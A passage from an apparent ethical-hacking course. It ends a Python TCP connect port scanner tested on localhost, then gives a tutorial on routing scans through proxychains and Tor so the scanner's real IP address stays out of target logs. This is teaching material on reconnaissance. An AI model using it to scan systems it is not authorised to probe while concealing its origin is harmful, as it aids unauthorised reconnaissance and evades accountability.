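    """Connect scan (nmap -sT): a completed SYN / SYN-ACK / ACK handshake means open,
    an RST (ConnectionRefusedError) means closed, and silence until the timeout is
    reported as filtered, which is what a dropping firewall looks like.
    Returns (state, banner)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except ConnectionRefusedError:
        s.close()
        return "closed", None
    except (socket.timeout, OSError):
        s.close()
        return "filtered", None
    try:
        banner = s.recv(256).decode("ascii", errors="replace").strip() or None
    except (socket.timeout, OSError):
        banner = None
    finally:
        s.close()
    return "open", banner


def scan(host, ports):
    """Probe each port; returns {port: (state, banner)}."""
    return {p: probe(host, p) for p in ports}


if __name__ == "__main__":
    srv, open_port = start_listener()
    closed_port = find_closed_port()
    for port, (state, banner) in scan("127.0.0.1", [open_port, closed_port]).items():
        print(f"{port}/tcp {state:8s} {banner or ''}")
    srv.close()
```

Because this completes the full handshake, the target's service sees a real connection and logs it; that is the trade-off against a SYN scan, which needs raw sockets (and root) but never finishes the handshake. It is also why a connect scan is the only kind that proxychains can carry.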

Ethical Hacking Week 4: Anonymity in Port Scanning

This post assumes you are using Kali Linux.

Proxychains and Tor

One key thing to do before performing port scans is to mask your IP address. Most systems sit behind firewalls or intrusion detection that log scans, and the logged source address identifies you. The solution is a proxy: an intermediary machine whose IP address appears in the target's logs instead of your own. Chaining the connection through several proxies makes the path back to you harder to trace.

Tor is free and open-source software for anonymous communication that routes internet traffic through a worldwide volunteer network in order to conceal a user's location. Without Tor your computer makes a direct TCP connection to the web server you are browsing, and the server sees your IP address. With Tor your data passes through several relays and never connects to the server directly; only the exit node contacts the web server, so the server sees the exit node's address rather than yours, and no single relay knows both who you are and where you are going.

Setup and Installation

First check whether proxychains is already installed by running sudo apt install proxychains; if apt reports that it is already the newest version, you have it. Next find its config file, which lives at /etc/proxychains.conf. You can also use the locate command to find it, but if proxychains is installed the config file is somewhere on your system.

Open the file with vim or nano, whichever you prefer (sudo vim /etc/proxychains.conf), and press i for insert mode. Uncomment dynamic_chain (remove the #) and comment out strict_chain, so that a dead proxy in the list is skipped instead of failing the whole chain; leave proxy_dns enabled so DNS lookups go through the proxy too rather than leaking your address. Then scroll down to the [ProxyList] section at the bottom and add socks5 127.0.0.1 9050 (Tor's SOCKS port; the default socks4 127.0.0.1 9050 line that is already there can stay). Finally press Escape and type :wq to write the file and quit.

Next check whether Tor is installed by the same method (sudo apt install tor). Start the service with sudo service tor start and confirm it is active with service tor status (press q to leave the status output). Finally run proxychains firefox google.com, open a "what is my IP" page, and check whether your real IP is masked. If the address shown is a Tor exit node rather than your own, you are successfully using proxychains.